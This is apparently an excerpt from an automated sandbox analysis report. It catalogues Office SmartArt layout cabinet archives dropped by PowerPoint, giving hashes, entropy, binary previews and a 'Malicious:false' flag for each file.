                                                                                                                              File Type:Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):21791
                                                                                                                              Entropy (8bit):7.65837691872985
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:PWew5RNDcvPgbA8E0GftpBjE0hsyaFLrHRN7BD9lI66YR:P3GRNDcEA8Pi60hsyABDo66g
                                                                                                                              MD5:7BF88B3CA20EB71ED453A3361908E010
                                                                                                                              SHA1:F75F86557051160507397F653D7768836E3B5655
                                                                                                                              SHA-256:E555A610A61DB4F45A29A7FB196A9726C25772594252AD534453E69F05345283
                                                                                                                              SHA-512:2C3DFB0F8913D1D8FF95A55E1A1FD58CE1F9D034268CD7BC0D2BF2DCEFEA8EF05DD62B9AFDE1F983CACADD0529538381632ADFE7195EAC19CE4143414C44DBE3
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF............D................................?..................................RadialPictureList.glox.................Content.inf....8....[.... $nq......C...../U..........a......S.Q...Q....j............(..z,.g.........^...Y..D... #i.TH5.<.=N..$..7.p".7.............`.3..1~,=,(.d8.Z.1....4'G.....!W^gClf._j.-N..&k.....Y3` =.(S..B^...i.zB.U....0O..h...I.(.......L...5.X.8.Sc<=>w.=.?&.....mR.......x.......mpW.T..^.FU...SN.C)......vsa.,x......,....E..i>..[g...#t...M..GR.9..$/4.:..q.bc9..x{bC.0..K.)..t.Y.&.v.d.16.B..c..or..W.,.B.........O.0..k.v........*F+..U.w...d...o8......A).}...#......L.!?.U.r.^.$...e.(..PG)8..+.9.5.l}.)..b.7+. 4....-.lC...|..j..Q.,.....7.W...|;j...%...:...|H..........<..%...K.....Fy.q$.k..}..8.9.M.u.?$].......r.....e.|..._..iT.;Dq5[....f.s..P.......e.T....!Y{.....t.wm..A..w-..7...3..T.:8.4.a[.Oo.. V.l.@.}..........E.&..J.....+..+.9)9<.._R.Hb.....V..Qu....:v.t.Li.0..J..V..b...!..N....-mD..c..(.[&o>.M.b..H.q..lk../..........W.8..z..B...
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):20235
                                                                                                                              Entropy (8bit):7.61176626859621
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:j3W3yGyjgbA8E0GftpBjEHvFLrHRN7pDAlI66Yv1:j3WFyAA8Pi6HVpDZ66c1
                                                                                                                              MD5:E3C64173B2F4AA7AB72E1396A9514BD8
                                                                                                                              SHA1:774E52F7E74B90E6A520359840B0CA54B3085D88
                                                                                                                              SHA-256:16C08547239E5B969041AB201EB55A3E30EAD400433E926257331CB945DFF094
                                                                                                                              SHA-512:7ED618578C6517ED967FB3521FD4DBED9CDFB7F7982B2B8437804786833207D246E4FCD7B85A669C305BE3B823832D2628105F01E2CF30B494172A17FC48576D
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF............D................................?..................................BracketList.glox.................Content.inf....7r...[.... G.q..@...B.....?X!.A.......!........X..Vk.JK...Z..=......PD.....P....5...jp..+..T....b.)np5.7.....Zz........... ..!.....S......1....`....h......T?.Nq../......z....[..:..5f;....O...d.FxD...4...Z....[..a...w..W.[..P...5.]...6..."...+t].!...2\%%`Q.\..)...=>.)......a.$.2.,...2,.Lw.?..+..qf....h....T/B.....}T.E...'.%.....,.......X....b..gt.hPYc|.....a...j...=...{..a.`!8!..|...L.T..k..!,.R.z/W....{..,...+..w.m..sQ..7<x..B....?....\.)..l...d...}.....v..W.C..'=p1c.Z=.W.g.e....&wm..N,..K.T../.oV../=9.}.....".28...r.Q....dzj{....S...1m...x9_...2PXpa...Q.n.$z...c..SGq...k......}kPE..*...3.|.5A.>..6.......+)qCB....q....qNkGe...W]..o..Z...J.<.i......qq.8....q..BE.(...._h.U.\@3.F...KdO..=1j+....).*Q.|B..Z..%......LDYk....j.....{klDW..#CVy}...X..O!..}..s..&..DC.....tL.j..b.......[...n.'..1..Xc...9Q..gM.....n..3...v.....~.).
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):23597
                                                                                                                              Entropy (8bit):7.692965575678876
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:y6aR//q0bJi/Uj+957G8E0GftpBj/4YOFLrHRN7LxhKll7PK/ph:y6I/Li/UjmVG8PiZ4YsLxh6Ih
                                                                                                                              MD5:7C645EC505982FE529D0E5035B378FFC
                                                                                                                              SHA1:1488ED81B350938D68A47C7F0BCE8D91FB1673E2
                                                                                                                              SHA-256:298FD9DADF0ACEBB2AA058A09EEBFAE15E5D1C5A8982DEE6669C63FB6119A13D
                                                                                                                              SHA-512:9F410DA5DB24B0B72E7774B4CF4398EDF0D361B9A79FBE2736A1DDD770AFE280877F5B430E0D26147CCA0524A54EA8B41F88B771F3598C2744A7803237B314B2
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF............D................................?..................................pictureorgchart.glox.................Content.inf.W..y....[.............../.jC....U.CUUUTU.5...jjPU..MP....T..0*....o0.......Y.=....P.({.3.p..."pA!>r../3.q..7...........!...TO....(..%......6...3E?....~......CZmndse.Qy....p....h....=.:5...F..%.E.&.v.`I~. ..%._..b]..Y..Q..R.........nN.q8c..a..L..X/.M...PP.q..SpZ.K]>D"Pf..B.c....0..|I.Q.,.g/..Kev.../..=......w..}3.....(....+#T.....K`N.u..Z.....rriK.(...(...6.<R.%.]..NX..b..].C.u....++......Ia.x. .7....J.#............w>....7..R...H>....@%....~.yA.......~.UB..*. .P..$...-...v.....=M."....hw..b....{.....2pR....].C..u@=G."Y..;..gc/N.N.YB.Z.q.#....$....j.D.*.P..!.)S.{..c....&'E.lJ%.|O.a...FG.|.....A..h.=c7.)d.5...D...L...IQ..TTE.*NL-.*M..>..p0.`......m..,.w#rZ..wR\@.Wn..@Q...}..&...E...0K.NY....M.71..`.M./:.>..._L..m...,U.l....._fi...nj9..,..w.s.kJ.m.s.M.vmw.!.....B.s.%.-').h.....)c.l....F..`3r...-.....0..7..&N.....n.#H...<7
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):25314
                                                                                                                              Entropy (8bit):7.729848360340861
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:75V23GNhfG/YvmBqWDP7G8E0GftpBjEB1vrFLrHRN7mKll7PK/pRU0:LS/Yvc7TG8Pi6BLm6IS0
                                                                                                                              MD5:C47E3430AF813DF8B02E1CB4829DD94B
                                                                                                                              SHA1:35F1F1A18AA4FD2336A4EA9C6005DBE70013C7FC
                                                                                                                              SHA-256:F2DB1E60533F0D108D5FB1004904C1F2E8557D4493F3B251A1B3055F8F1507A3
                                                                                                                              SHA-512:6F8904E658EB7D04C6880F7CC3EC63FCFE31EF2C3A768F4ECF40B115314F23774DAEE66DCE9C55FAF0AD31075A3AC27C8967FD341C23C953CA28BDC120997287
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF.....#......D............................#...?...................#..............InterconnectedBlockProcess.glox......#..........Content.inf...<.:#.$[......O..........5f.P.5CU..6..jT..U..U..UM.T.........h................-... .......6...`.....G...........'.,DN:........... "..4..1u.....%.u..{{,....@lp..}..`.......Z...K.....Z..... Z4.<?..C.BF.....k.!Hl...]...Tvf..g....)...vny6.'..f....Z.R.`.......+....!..!.....:..4fj....."q..f..E..^!k.....M.c....R...B......g...~.........o.'.7,.e.,..7.R.e,(.+..+:....Q....f...P.H.I..U.....Jl...l...z.]7...C...<...L.,..@...i.{..e]K...2..KRW..7.-'.G.l!.n7..J.v.C...%/.....q...@..l..e..$..N..sg8]oo.(q(_.?.X.s...Ua..r0...Rz.o.eT.j...b*..}",n.qou..M.[.;%../c.x.4.z.2*.U.]..D...h...-R.$.=\3..P......N.mP......J...}BPn...g]d.5k..C.ee.ml...\.g...[.......<..6$.%.I#S9..I...6.i........_..P.n....c$.3..zw.hF......_{.+...o...[.&........&...M..m.....;....0....D7...4nQ.=/.._`._.nh.D.m..h.+....8..p..q.4.w.\...iy...*...lN6F..c.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):22008
                                                                                                                              Entropy (8bit):7.662386258803613
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:M7FUtfIdqSHQs7G8E0GftpBjED/C4RQrFLrHRN7TT8DlvQyUTL2mH:sWgdqR2G8Pi6D6YQZTTMvU+mH
                                                                                                                              MD5:ABBF10CEE9480E41D81277E9538F98CB
                                                                                                                              SHA1:F4EA53D180C95E78CC1DA88CD63F4C099BF0512C
                                                                                                                              SHA-256:557E0714D5536070131E7E7CDD18F0EF23FE6FB12381040812D022EC0FEE7957
                                                                                                                              SHA-512:9430DAACF3CA67A18813ECD842BE80155FD2DE0D55B7CD16560F4AAEFDA781C3E4B714D850D367259CAAB28A3BF841A5CB42140B19CFE04AC3C23C358CA87FFB
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF............D................................?..................................architecture.glox.................Content.inf..q5.^...[.....0y......../..CL.C5.Q..U5g.z....UUUMPC...C..P....T.....=..s..4c...-3H..E...2..2*..T...../.i.;$..............%...................'h.........#0.......[........c.h.....O...%.61...[.J..:.,^....W.]$..u...N.R.....H.......:%I.g5Kd.n6...W2.#.UL..h.8NN../.P...H.;@.N.F...v."h..K.....~.....8...{.+...&.#A.Q'..A.....[NJ.X.....|.|.G5...vp.h.p..1.....-...gECV.,o{6W.#L....4v..x..z..)[.......T.....BQ.pf..D.}...H....V..[._.'.......3..1....?m..ad..c(K.......N.N.6F%.m......9...4..]?...l6..).\p;w.s....@...I%H.....;\...R......f...3~:C...A..x....X...>...:~.+..r@..."......I..m.y..)F.l..9...6....m...=..Q.F.z..u......J].{WX...V.Z.b.A0B..!....~.;Z.....K.`c..,X.MFz....].Q.2.9..L."...]...6...JOU..6...~../......4A.|.......i.LKrY...2.R.o..X.\....0.%......>H.....8.z..^....5d|...4|...C......R28.E......a....e...J.S..Ng.]<&..mm
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):20457
                                                                                                                              Entropy (8bit):7.612540359660869
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:KyeISBuydn5rpmp77G8E0GftpBjE/kFLrHRN7ngslI66YVj:KHISBvd5rpmFG8Pi6/6nK666j
                                                                                                                              MD5:4EFA48EC307EAF2F9B346A073C67FCFB
                                                                                                                              SHA1:76A7E1234FF29A2B18C968F89082A14C9C851A43
                                                                                                                              SHA-256:3EE9AE1F8DAB4C498BD561D8FCC66D83E58F11B7BB4B2776DF99F4CDA4B850C2
                                                                                                                              SHA-512:2705644D501D85A821E96732776F61641FE82820FD6A39FFAF54A45AD126C886DC36C1398CDBDBB5FE282D9B09D27F9BFE7F26A646F926DA55DFF28E61FBD696
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF............D................................?..................................chevronaccent.glox.................Content.inf..O.$N...[.........B.....?.....$Zy..Zkr...y<.....Di-.aVX/....h..-.~........#.../.Fz....T...p....A..eHMe[..p...=................f..../%o......F@..=..$.B!....}.0..g..^vlI......f.W.F...Nm..2`...)...,.HL4.nsl.F.ir.k..e.!^.j2.v.iT....t...*..!h..Y...2Q..-.x.,.Xj.U.cj,....9.....)..W..n3f.......(cH.D.4M.!.+..4..3r..y......|r..@.PD.R..#...F..nJAR..1{-.....u3..$..L.b+h....:lZ.>....q.?. ~l..^.%.m....a...cG.h.?.|.?7.'....b.G.4..'..A...o.Z...//..?...d..*.....C..Z.....]Yv.g.]..... .........]x.#=.../.7;R.j....G.....zq=O`[.'5g.D.u..)..../../.v.JmCW.da....3.f..C.z%...S=....;A.q.|....z.E.aRu........ k..J"+.f.S.@.........eD4....\0..t./U..%.H..........M:..U.......J...Z..H.DG..u^..D..P....`.^b.........`c......#.....c.?...#..C.V.&.'..f.'...f.[..F.O..a...&..{TiXg4; .X."..0...B.#..^..........N"..w.@f...gd.S..K.....E....ZR...;.twR>.z.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):31083
                                                                                                                              Entropy (8bit):7.814202819173796
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:0XbSq3W46TVZb5fOFo1HtZwGqtRT44hS+nyBoiuFgbA8E0GftpBjEcBFLrHRN7Ku:0XpOflfOFo1DMr/iuuA8Pi6cfKjW66b
                                                                                                                              MD5:89A9818E6658D73A73B642522FF8701F
                                                                                                                              SHA1:E66C95E957B74E90B444FF16D9B270ADAB12E0F4
                                                                                                                              SHA-256:F747DD8B79FC69217FA3E36FAE0AB417C1A0759C28C2C4F8B7450C70171228E6
                                                                                                                              SHA-512:321782B0B633380DA69BD7E98AA05BE7FA5D19A131294CC7C0A598A6A1A1AEF97AB1068427E4223AA30976E3C8246FF5C3C1265D4768FE9909B37F38CBC9E60D
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....[:......D...........................[:...?...................A..............CircleProcess.glox......A..........Content.inf......9.B[.....@*........!...(A.D..K.W.wwpwJj\.K\w...]...K.!.....@0..?,...}won`... ....&I..(;.....X.u..^.R..^......_:....W>f\....T...B..i`|q.....................i.5....(........0q7@.@..F...?A.`.....,L.......5.+../56..a`....1C5..9.*I.N.......@|<+./......... .ya....>l.,t.......y.y5...FF.,F..jCA...SA..H....8u.L..eM?.w8.......~^.Mr.[...(.._......u..+.......j..TJ.:<.3.X`...U.bz...[...r-...[...+..B.......}...\'.i...C.8.B_...c.8</..s.....VQ.Y..m.,.j~;y ...2.5.VQ...K..jP..2..r-...HA...."..9).7.....5.E._.wq.......!.+n+.f...s].4M'.1&...5....4..k..NV.M1.7`a..<.P4.|.mrd.i.R...u...............v.}..n\.C$.....[..2c.^..W..g..._.0.C.o....%.z.!.;.@y.`\..UO#i.)...Q...........L. .\:_..H.{.W...@...T.4..A.a...Wo?o$4.....#.V.s8M.Gh..p?A...Y.....)...........r|...!..o9...8..%#.[....;...3<Z...g....~.Z....,.(...qA.'x#..xC..@...HOuW.[.[....c.........
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):21111
                                                                                                                              Entropy (8bit):7.6297992466897675
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:wWZsOvbMZGgbA8E0GftpBjEtnFLrHRN7Dfll7PK/pirk:xZRvuzA8Pi6t9DPISk
                                                                                                                              MD5:D30AD26DBB6DECA4FDD294F48EDAD55D
                                                                                                                              SHA1:CA767A1B6AF72CF170C9E10438F61797E0F2E8CE
                                                                                                                              SHA-256:6B1633DD765A11E7ED26F8F9A4DD45023B3E4ADB903C934DF3917D07A3856BFF
                                                                                                                              SHA-512:7B519F5D82BA0DA3B2EFFAD3029C7CAB63905D534F3CF1F7EA3446C42FA2130665CA7569A105C18289D65FA955C5624009C1D571E8960D2B7C52E0D8B42BE457
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....g.......D...........................g....?..........}.......................TabList.glox.................Content.inf....t....[......@..C...../.U5...........6...`.....T..>3.................=..09`..t......a..Y..BI.Z....=.'0...%...T..........H...>.:A.r......n..p...Pf.h...I.8... ....M.]&.#.vv'.....[c......g....>"......<c..f....i...sb!Z..iu<.%|......q.....G28.h-...7.....W.v...RtdK..F~.0.3.'.e..b7.c......a.3.....a\..]...gp8.+.u/}.w.qF........8.=.=|....\~..S.-q}]0...q.B.H.^J...!...a'.2Tn!..."..%........=.e_-.....{o..%o...a`.w..L.5..r.....e.8...pO..RE.Wgr..b.%.E...O.......8s...E....Um].C..M.....[...H.FZ..4...eZI.$..v.3<]..r....B..............8i......e<.D...Q4.q.^S.....H.b.......r.q..0o.......2..PP,."...JI...xU`.6f..K..Q9.Q..h..t....AI.S6...7............X..`dv..r..S....),7ES....#.....(...\.nh...X.ps%l..F...."<_....q....v........_.e.....P.........|&..fi..4..@..^0..v.]7.......^. ."..}(...w.g.X...=<....p.......L...P..XV....@:....N...Y....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):22594
                                                                                                                              Entropy (8bit):7.674816892242868
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:L7d2l8FbHaaIKbtv1gDISi8E0GftpBjEZRFLrHRN74bUll7PK/pd:LUlCIOt/8Pi6Zv4bMId
                                                                                                                              MD5:EE0129C7CC1AC92BBC3D6CB0F653FCAE
                                                                                                                              SHA1:4ABAA858176B349BDAB826A7C5F9F00AC5499580
                                                                                                                              SHA-256:345AA5CA2496F975B7E33C182D5E57377F8B740F23E9A55F4B2B446723947B72
                                                                                                                              SHA-512:CDDABE701C8CBA5BD5D131ABB85F9241212967CE6924E34B9D78D6F43D76A8DE017E28302FF13CE800456AD6D1B5B8FFD8891A66E5BE0C1E74CF19DF9A7AD959
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....2.......D...........................2....?..................0...............ThemePictureAccent.glox.....0...........Content.inf.o.@D..8.[.........B.....?. $...K.....~....aZ.WA"...k.......Z......."......"..X.fpB 2@d..87.[.A......p..e.'......F..P^%.%.RK...........T%0..........9..+8 ...&.q.....+.......^.fad^^n...d.....s1..... .3j.c-c7..y<.....6........C5n.KG...Rs[lt..ZkwI.!..Uj.ez_!A^: /.;.Rl4....^..<6..N...'.YY.n*.E{.`..s.7..z.......L.y.Y.....q.kx.....[5.+<to......1...L.r.m..kC.q.k.1..o.w8s.....xh.@.b.`l\...}z1.6..Y.</DY...Z5..D...0..4.;..XAA..0qD..E.....h...C..hH......S..Z.\.VBu......Rxs.+:RKzD......{......a..=......).<.....d.SM.......c!t.4.h..A=J~.>q?Hw.^.....?.....[..`....v.nl..A.u...S!...............c......b.J.I.....D...._?}..or.g.JZ#*."_``.>.....{...w......s...R.iXR..'z....S.z.\..f.....>7m..0q.c-8\..nZw.q..J.l....+..V....ZTs{.[yh..~..c........9;..D...V.s...#...JX~t8%......cP^...!.t......?..'.(.kT.T.y.I ...:..Y3..[Up.m...%.~
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):21357
                                                                                                                              Entropy (8bit):7.641082043198371
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:zdx+NRrogu6fzCI7Th7G8E0GftpBjEzZq4FLrHRN7/Oll7PK/pB:/+NRrFf/G8Pi6zZb/GIB
                                                                                                                              MD5:97F5B7B7E9E1281999468A5C42CB12E7
                                                                                                                              SHA1:99481B2FA609D1D80A9016ADAA3D37E7707A2ED1
                                                                                                                              SHA-256:1CF5C2D0F6188FFFF117932C424CC55D1459E0852564C09D7779263ABD116118
                                                                                                                              SHA-512:ACE9718D724B51FE04B900CE1D2075C0C05C80243EA68D4731A63138F3A1287776E80BD67ECB14C323C69AA1796E9D8774A3611FE835BA3CA891270DE1E7FD1F
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....].......D...........................]....?..........{.......................rings.glox.................Content.inf..|^.....[......P........<.$.."..0R..xa.Ax#B..d... ....K,.....^.H.....H.........&.j.\f.. ..,....,..!k..R..e..!...E...........................><.RB.....~h...........Q................g..M|,...x.....qV7.u..\...F-N.{-..X..&Zig.~..{.A.p.Z...X..{,-n............`$.%.ND.....>].6cvZ.%d..*a.$..-.K.Hf....L..;.#...H....U,........P.@.*-$C.,.g...%YJE..$.jP........b...Y<..[U...MF]F.K...1... x.}3w.o.#,.}T.....w5+...=.=...c.F^....OM.=.......G_{n.*...WC.w!......{/.~.}..s..6_......)..Xy...4.....<..XZJ........#~._i....%..fM.V.?.q...q.....7...B..sVt...(.:..c....~.e...kGZ...C..(J..o...`...?.)-.T.l....&...gR.$.....g.:...2.e%F.....x....z0...K..a8B...........D..]....7....~.".DR...r)...}b)e.>.\h~f...(}.c........Q...o5H.........C.KC.(.L.l................R..a.pg{..\.......-b........}.C......qTS..%..r.lG..Q.1..Z.>a.D...tC..LV...Rs.C.M18x.:......%O.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):22149
                                                                                                                              Entropy (8bit):7.659898883631361
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:b98FG/zdCbf7BOEawSi8E0GftpBjEPTFPxFLrHRN7S5ll7PK/pA2:N/zAbDae8Pi6PFPSRIA2
                                                                                                                              MD5:66C5199CF4FB18BD4F9F3F2CCB074007
                                                                                                                              SHA1:BA9D8765FFC938549CC19B69B3BF5E6522FB062E
                                                                                                                              SHA-256:4A7DC4ED098E580C8D623C51B57C0BC1D601C45F40B60F39BBA5F063377C3C1F
                                                                                                                              SHA-512:94C434A131CDE47CB64BCD2FB8AF442482F8ECFA63D958C832ECA935DEB10D360034EF497E2EBB720C72B4C1D7A1130A64811D362054E1D52A441B91C46034B0
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....u.......D...........................u....?..................................HexagonRadial.glox.................Content.inf.........[.....`........./.mT.T6...CP..z5...0.PcUmCUSUCU.Q.P.0..f............^...H..2e.[..8...ld......*F.%.j.w!R..NA.L............ .r..z....$&.........P.=.r...O...e..dfv_.i%.C....^......?..x...+d..].B.3..EU...|Cc..z.`lQp..fr.....8!;.8.p.ZwH\.........~..T.t..]..H.]..S.2..Vt.....r.H../..-8........!:.Y&..|A..J.U...-.%..k..U...4m.. .q../..b.8.vc~......_q1.?..Bh.v.....L..I.$I..s.".u.. Y....I^5.v...3.......].^)b.t.j...=...Ze~.O...|.}T.._9c........L....BV.^......X..?.....{.>.j..5.m...d.7........g[..f.nST...i..t..|.T.jjS..4p.Pxu..*..W...|.A)..|9;....H.e.^.8D..S...M..Lj.|...M.m+..H.....8.&-....=.L.....n.v..M.9...l....=r......K.F.j.(.(xD.3..r'9.K..-...5..Z..x....._....a[...J...`.b_a\\j.ed..\.3.5....S.T...ms.....E...Xl.y.LH=...}..0.T...04.4..B[..H.....B{B9.h..=.8Mn.*.TL.c..y.s.?.c9$l...).h).6..;.X../_>Pl...O...U.R..v.dy$A
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):19288
                                                                                                                              Entropy (8bit):7.570850633867256
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:5ZII4Hf+7G8E0GftpBjCwBFLrHRN7bcClvQyUTL2mH:pG8PicgbcAvU+mH
                                                                                                                              MD5:B9A6FF715719EE9DE16421AB983CA745
                                                                                                                              SHA1:6B3F68B224020CD4BF142D7EDAAEC6B471870358
                                                                                                                              SHA-256:E3BE3F1E341C0FA5E9CB79E2739CF0565C6EA6C189EA3E53ACF04320459A7070
                                                                                                                              SHA-512:062A765AC4602DB64D0504B79BE7380C14C143091A09F98A5E03E18747B2166BD862CE7EF55403D27B54CEB397D95BFAE3195C15D5516786FEBDAC6CD5FBF9CD
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....H.......D...........................H....?..................................VaryingWidthList.glox.................Content.inf...O.....[.... v.q......R.....>.%i.I.HhD.V...qt.....'....N...!..aw$(J.%(..A..h......l|.D.p9`..Y09.:.u....p. :,.*.YD=0.p. ......w.........*..<..;.....u.."......7[....8.....?^........-..;q.|.....B....PJ....r.K#.#.0'...}.........+gpR...T....5.iu.^I...A\..gK....}..z.B.nT.../.m.......N....E'1.E.\..o.....W..R.#.#...8.7...R.SbW-...%......$.obj.F..W_@....sY!........s.O..."k. ..b....j....v...P.\....7d...|"J.T...2p..m.&..r..,2.).....X.`...xt].U...b.h..V.....|L..N.Z.O#....o...1R.w30.g..?;..C.T.:$..MGY.C"i\.f..#..<.k...m..s.w. ..Ga].....wt.h|.Ta<.......(SO.]9.%a..Z... r._JH.=O...P.9a.v.....Kj.".T...m...4.?...F...$...y.....hbW.UA..u.&)....py.C{.=t.....n...}|H3A9.=..W..JJ..y./Y.E.M9..Z..w. .HB.YoIi..i.e..9;n...SpHw,....f....d>..g.m..z...... ...f...KP.M..U.....~vFD.fQ.P?......2!.n.....`@C!G...XI.].s,.X.'...u.E.o..f
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):21875
                                                                                                                              Entropy (8bit):7.6559132103953305
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:k73HRpZA6B3ulrnxtRT7G8E0GftpBjEdHqlFLrHRN7uhFlvQyUTL2m4c:k7XRgIkrG8Pi6dmuNvU+mp
                                                                                                                              MD5:E532038762503FFA1371DF03FA2E222D
                                                                                                                              SHA1:F343B559AE21DAEF06CBCD8B2B3695DE1B1A46F0
                                                                                                                              SHA-256:5C70DD1551EB8B9B13EFAFEEAF70F08B307E110CAEE75AD9908A6A42BBCCB07E
                                                                                                                              SHA-512:E0712B481F1991256A01C3D02ED56645F61AA46EB5DE47E5D64D5ECD20052CDA0EE7D38208B5EE982971CCA59F2717B7CAE4DFCF235B779215E7613AA5DCD976
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....c.......D...........................c....?..................................ThemePictureAlternatingAccent.glox.................Content.inf...3.....[.... .qq...........\<.^......o."......f.o...x.{..q..^.MH^...........{0.K....4pX.i...@6A4X.P.01d....'p.......zA.......... .......7.......a. `.=!@- ......>G.s.k~@.a.lfha:m....1...@.,G`....{....W..N..qs.......j.+TrsT.l.9..L...1+...d..-u..-.......).#u&...3......k.&C...DdZ.'.......8..<PF..r.eq.X6...u..v...s5.m.Q.l.G%.<.]....RV<...S..Dv..s.r.......dh.N.3-.Hf'.....3.GZ..E.kt.5......h...|...?!.L....~.)..v....:2.../F.,....o.qi.i7..E.|.mh.R_.@A.FO@i.....Feo...x.l...{E.\W9|V...=#..3..(......tP.:i....Ox.U.N...%6...p.6&.....<zh.z.|.<Z.?.k....y7m...F.Z$-.:.l.h...{T..7....?..T...d,r...z?../...`/Z......a.v@)....u......V..v.:.._.|.'..[..O.s.OAt-."b.In"..I...J*.~H.:-...?..uV....dZ;z:.l.{.E.,.Q..i]:.0r.I.y..f...../j.wN...^R.....u....>..}....f.f...]A..C~;/....%..^#..N.a..........99.....`.....%..iS....S......$....)
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):22340
                                                                                                                              Entropy (8bit):7.668619892503165
                                                                                                                              Encrypted:false
